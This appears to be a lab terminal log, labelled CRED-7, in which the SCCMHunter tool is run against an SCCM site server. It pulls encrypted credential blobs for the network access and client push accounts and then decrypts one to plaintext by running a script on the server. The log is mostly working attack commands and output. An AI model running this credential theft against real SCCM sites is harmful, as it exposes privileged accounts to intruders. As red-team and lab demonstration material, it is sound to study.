CRED-7

┌──(impacket)─(kali㉿SCCM1-kali)-[~/sccmhunter]
└─$ python3 sccmhunter.py admin -u 'ludus\domainadmin' -p 'password' -ip 10.2.10.15
SCCMHunter v1.0.9 by @unsigned_sh0rt
[16:21:04] INFO     [!] Enter help for extra shell commands                                                                                                                                                                                            
() C:\ >> 

() C:\ >> get_device sccm-sitesrv
[16:24:04] INFO     ------------------------------------------                                                                                                                                         
                    Active: 1
                    Client: 1
                    DistinguishedName: CN=SCCM-SITESRV,OU=Servers,DC=ludus, DC=domain
                    FullDomainName: LUDUS.DOMAIN
                    IPAddresses: 10.2.10.15
                    LastLogonUserDomain: ludus
                    LastLogonUserName: domainuser
                    Name: SCCM-SITESRV
                    OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
                    PrimaryGroupID: 515
                    ResourceId: 16777223
                    ResourceNames: sccm-sitesrv.ludus.domain
                    SID: S-1-5-21-1740373489-3502891397-2242058250-1108
                    SMSInstalledSites: 123
                    SMSUniqueIdentifier: GUID:C798EE32-DFD0-4A21-BF95-2606755C0FE8
                    ------------------------------------------   

() (C:\) >> interact 16777223
(16777223) (C:\) >> 

(16777223) (C:\) >> get_creds
[16:33:55] INFO     Tasked SCCM to extract all encrypted credential blobs                                                                                                                                                                              
{
    "@odata.context": "https://sccm-sitesrv.ludus.domain/AdminService/wmi/$metadata#SMS_SCI_Reserved",
    "value": [
        {
            "AccountUsage": [
                "Software Distribution"
            ],
            "Reserved2": "0C0100000B000000010200000366000000A40000081584A380F7995B0D32B802F64F4AFFA90ED6A55AC90B4709097708BF335FAA0330349FAED187B80221F596B847B1E9B4100E2616E8CE32E0DA95B4538DF2805036C700037BFCEA1C4CE4F6A61068491D2CB0BD09A50F908C7D2A7EE6C4319BC885A93431900A8DDF9CFC65CAF03F130A776E5C2ABAC5CCFB20018B78FA86433F3F7D2823AFB326491E1FA0D1C30E9E456E37532AE3FA16D8CED6A59D3C2FDC8DFE1FF951BC83761812997E1313A7873D0184D6B810159E54B108F9E0D60095FF29588C0F64FB122C244F307F614E0E2763A7CFDD84852F18090CC97F36233D46CC9485BE65DC32F6FD4794891315AED9321697F369F967CBFFC1CCE4E0CE25574758D15BD756B657C48C2D3A20172D",
            "UserName": "ludus\\sccm_naa"
        },
        {
            "AccountUsage": [
                "SMS_CLIENT_CONFIG_MANAGER"
            ],
            "Reserved2": "0C0100000B000000010200000366000000A400001863799C7980125997830A4246C99E25FB703F0C841AF8AE779AB6D3430E7B9F558E37D65F36D1B1124F36517060B0EF030B0B7F475282B17631AAB9AEE73FA2571123A17BC3372FD5181414B00D1B10AB460B010CA55140A214C7241D12EBCB2C40398A13998C142E81CC6629D4933722E6C2AD82B659B913BE33BCA579105220724C5D398FE75149A4309BCAC96FEFB8ACA81269721CAD4BAD6C16F66DA1A4C6F1E78639D13EA8EE9AF96543AD796B9D2F4EEF51259A4C2C6A1764A5EC519D8FF6B6F8592F58E44D9116360E22D20D8D9F996799EC5638046AF4E1BD4A4E97E31579A6611CF81B93DFE0A984B79390CCD7E3EDE0872ECFFA2CA7E9DC50BB14533921928A192CFF32256111424947F0",
            "UserName": "ludus\\sccm_push"
        },
        {
            "AccountUsage": [],
            "Reserved2": "0C01000008000000010200000366000000A40000EFFD218016601EB6BF46A099AA22017898B9246DB5FCBBEA8A2668E4E7BD37FCACC9B3FDA61407A9CDB65BD1F521939CACBDE3E1D23A4C4DB52F9CAD40D6E91F1ADBAEC1F121D9CC64122C70F768D9CC0411020AA5E5BD039DA2112C8370B30AB2EC0C0053EBA5901F5031BACD7A176D16C3008EDE3077F3B18BFC98056C865DB32E64FBBD524124CAF5AD542E6E96DF5CF7EDB62E7AEFCCF7533C84954E13555D2608EAD4C3DB921073320E58120B227E2683380A3A408EB0BF14DFB9B0D59259BC887D001BD30561D9110100D1719CB39B4CE4930CC488AA20A9B2585006B9C3DF2B3CE312677E71401B94FDF40B69EA8941480A6D0CB76E904023C5809496572D07C0EC003878A407255E4CE9976D",
            "UserName": "test"
        }
    ]
}

(16777223) (C:\) >> decrypt 0C0100000B000000010200000366000000A40000081584A380F7995B0D32B802F64F4AFFA90ED6A55AC90B4709097708BF335FAA0330349FAED187B80221F596B847B1E9B4100E2616E8CE32E0DA95B4538DF2805036C700037BFCEA1C4CE4F6A61068491D2CB0BD09A50F908C7D2A7EE6C4319BC885A93431900A8DDF9CFC65CAF03F130A776E5C2ABAC5CCFB20018B78FA86433F3F7D2823AFB326491E1FA0D1C30E9E456E37532AE3FA16D8CED6A59D3C2FDC8DFE1FF951BC83761812997E1313A7873D0184D6B810159E54B108F9E0D60095FF29588C0F64FB122C244F307F614E0E2763A7CFDD84852F18090CC97F36233D46CC9485BE65DC32F6FD4794891315AED9321697F369F967CBFFC1CCE4E0CE25574758D15BD756B657C48C2D3A20172D
[16:37:59] INFO     Tasked SCCM to decrypt credential blob                                                                                                                                                                                             
[16:37:59] INFO     [+] Updates script created successfully with GUID 98b0ac33-6742-4422-8751-eb13cf8d37fd.                                                                                                                                            
[16:38:00] INFO     [+] Script with guid 98b0ac33-6742-4422-8751-eb13cf8d37fd approved.                                                                                                                                                                
[16:38:00] INFO     [+] Script with guid 98b0ac33-6742-4422-8751-eb13cf8d37fd executed.                                                                                                                                                                
[16:38:15] INFO     [+] Got result:                                                                                                                                                                                                                    
[16:38:15] INFO     Password123                                                                                                                                                                                                                        
[16:38:15] INFO     [+] Script with GUID 98b0ac33-6742-4422-8751-eb13cf8d37fd deleted.